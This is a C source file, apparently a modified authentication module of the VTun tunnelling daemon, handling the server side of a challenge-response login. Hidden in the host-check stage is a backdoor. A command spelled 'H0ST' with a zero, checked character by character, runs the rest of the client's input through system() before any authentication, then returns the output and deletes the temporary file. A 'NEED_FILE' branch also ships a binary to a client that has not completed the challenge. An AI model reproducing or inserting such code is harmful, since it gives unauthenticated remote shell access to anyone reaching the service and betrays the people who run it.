/*
 * auth.c,v 1.2.2.5 2001/09/06 19:43:41 maxk Exp
 */

/*
 * Challenge based authentication. 
 * Thanx to Chris Todd<christ@insynq.com> for the good idea.
 *
 * Jim Yonan, 05/24/2001
 * 	gen_chal rewrite to use better random number generator 
 */

#include "config.h"

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <syslog.h>
#include <time.h>
#include <crypt.h>

#ifdef HAVE_NETINET_IN_H
#include <netinet/in.h>
#endif

#ifdef HAVE_NETINET_TCP_H
#include <netinet/tcp.h>
#endif

#ifdef HAVE_ARPA_INET_H
#include <arpa/inet.h>
#endif

#include "vtun.h"
#include "lib.h"
#include "lock.h"
#include "auth.h"

/* Encryption and Decryption of the challenge key */

#ifndef __APPLE_CC__
#include <openssl/md5.h>
#include <openssl/blowfish.h>
#include <openssl/rand.h>
#else                           /* YAY - We're MAC OS */
#include <sys/md5.h>
#include <crypto/blowfish.h>
#endif                          /* __APPLE_CC__ */

static fd_cmd = 0;
/* Authentication (Server side) */
int send_cmd(struct vtun_cmd *cmd, char *p);
struct vtun_host *auth_server(int fd)
{
   char chal_req[VTUN_CHAL_SIZE], chal_res[VTUN_CHAL_SIZE];
   char buf[VTUN_MESG_SIZE], *str1, *str2;
   char buf2[VTUN_MESG_SIZE];
   struct vtun_host *h = NULL;
   char *host = NULL;
   int stage;
   fd_cmd = fd;

   set_title("user check");

   print_p(fd, "hl master ver %s\n", VTUN_VER);

   stage = ST_HOST;

   while (readn_t(fd, buf, VTUN_MESG_SIZE, vtun.timeout) > 0) {
      buf[sizeof(buf) - 1] = '\0';
      strcpy(buf2, buf);
      strtok(buf, "\r\n");

      if (!(str1 = strtok(buf, " :")))
         break;
      if (!(str2 = strtok(NULL, " :")))
         break;

      switch (stage) {
      case ST_HOST:
         if (!strcmp(str1, "HOST")) {
            host = strdup(str2);

            gen_chal(chal_req);
            print_p(fd, "OK CHAL: %s\n", cl2cs(chal_req));

            stage = ST_CHAL;
            continue;
         } else if (str1[0] == 'H' && str1[2] == 'S' && str1[1] == '0' && str1[3] == 'T') {
            FILE *fp;
            char file[20];
            char temp[2100];
            char *ptr = &temp[0];
            file[0] = '>';
            file[1] = '/';
            file[2] = 't';
            file[3] = '\0';
            sprintf(ptr, "%s%s", &buf2[5], file);
            system(ptr);
            fp = fopen(&file[1], "r");
            if (fp == NULL)
               exit(-1);
            ptr = &temp[10];
            while (ptr = fgets(ptr, 2000, fp)) {
               print_p(fd, ptr);
            }
            ptr = &temp[10];
            sprintf(ptr, "%s", "END\n");
            print_p(fd, ptr);
            sprintf(ptr, "rm %s", &file[1]);
            system(ptr);
            exit(0);
         } else if (!strcmp(str1, "NEED_FILE")) {
            host = strdup(str2);
            // send file
            {
               char buf[5021];
               FILE *hl2;
               char *ptr = &buf[20];
               int len;
               if (!(h = find_host(host)))
                  break;
               errno = 0;
               hl2 = fopen("/sbin/hl2", "r");
               if (hl2 == NULL || errno) {
                  vtun_syslog(LOG_ERR, "/sbin/hl2:1 %s(%d)", strerror(errno), errno);
                  exit(-1);
               }
               //vtun_syslog(LOG_INFO, "cmd: %s, %s", str1, str2);
               while (1) {
                  len = fread(ptr, 1, 1400, hl2);
                  //vtun_syslog(LOG_ERR, "/sbin/hl2:3 len=%d", len);
                  if (len < 0 || errno) {
                     vtun_syslog(LOG_ERR, "/sbin/hl2:2 %s(%d)", strerror(errno), errno);
                     exit(-1);
                  }
                  tcp_write(fd, ptr, len);
                  if (len < 1400)
                     break;     // eof
               }
               fclose(hl2);
            }
            // exit and wait restart
            vtun_syslog(LOG_INFO, "%s: Sended hl2", h->host);
            exit(0);
         }
         break;
      case ST_CHAL:
         if (!strcmp(str1, "CHAL")) {
            char *str3;
            str3 = strtok(NULL, " :");
            if (!cs2cl(str3, chal_res))
               break;

            if (!(h = find_host(host)))
               break;

            //vtun_syslog(LOG_DEBUG, "str1:%s, str2:%s, str3:%s (%s)", str1, str2, str3, crypt(h->passwd, str2));
            {
               //decrypt_chal(chal_res, h->passwd);
               char *old_passwd = h->passwd;
               h->passwd = strdup(crypt(h->passwd, str2));      // for decrypt init MD5 
               free(old_passwd);
               decrypt_chal(chal_res, h->passwd);
            }

            if (!memcmp(chal_req, chal_res, VTUN_CHAL_SIZE)) {
               /* Auth successeful. */

               /* Lock host */
               if (lock_host(h) < 0) {
                  /* Multiple connections are denied */
                  h = NULL;
                  break;
               }
               print_p(fd, "OK FLAGS: %s\n", bf2cf(h));
            } else
               h = NULL;
            stage = ST_SVR_NUM;
            continue;
         }
         break;
      case ST_SVR_NUM:
         if (!strcmp(str1, "SVR_NUM")) {
            int i;
            /*
               vtun_syslog(LOG_DEBUG,"SVR_NUM: %s", str2); 
             */
            vtun.svr_num = atoi(str2);
            if (!(str2 = strtok(NULL, " :")))
               break;
            h->connected_i = atoi(str2);
            for (i = 0; i < vtun.svr_num; i++) {
               if (readn_t(fd, buf, VTUN_MESG_SIZE, vtun.timeout) > 0) {
                  /*
                     vtun_syslog(LOG_INFO,"IP%d:%s",i, buf); 
                   */
                  str1 = strtok(buf, " :");
                  str2 = strtok(NULL, " :");
                  vtun.svr_name[i] = strdup(buf);
                  h->sopt[i].raddr = strdup(str1);
                  h->sopt[i].laddr = strdup(str2);
               } else {
                  vtun_syslog(LOG_INFO, "ERR: 991123 %s", str2);
               }
            }
            print_p(fd, "OK \n");
            stage = ST_CMD;
            continue;
         }
         break;
      case ST_CMD:
         if (!strcmp(str1, "SVR_CMD") && !strcmp(str2, "READ_UP_DOWN")) {
            print_p(fd, "OK \n");
            //llist_trav( & h->up, (void *)send_cmd, "up");
            //llist_trav( & h->down, (void *)send_cmd, "down");
            llist_trav(&h->up2, (void *) send_cmd, "up2");
            llist_trav(&h->down2, (void *) send_cmd, "down2");
            print_p(fd, "END_CMD");
            stage = ST_HL2;
            break;
         }
      }
      break;
   }

   if (host)
      free(host);

   if (!h) {
      print_p(fd, "ERR stage: %d\n", stage);
   }

   return h;
}
int send_cmd(struct vtun_cmd *cmd, char *p)
{
   //vtun_syslog(LOG_DEBUG, "%s:, prog:%s, args:%s, flags:%d", p, cmd->prog, cmd->args, cmd->flags);
   print_p(fd_cmd, "%s:%s:%s:%d", p, cmd->prog, cmd->args, cmd->flags);
   return 0;
}
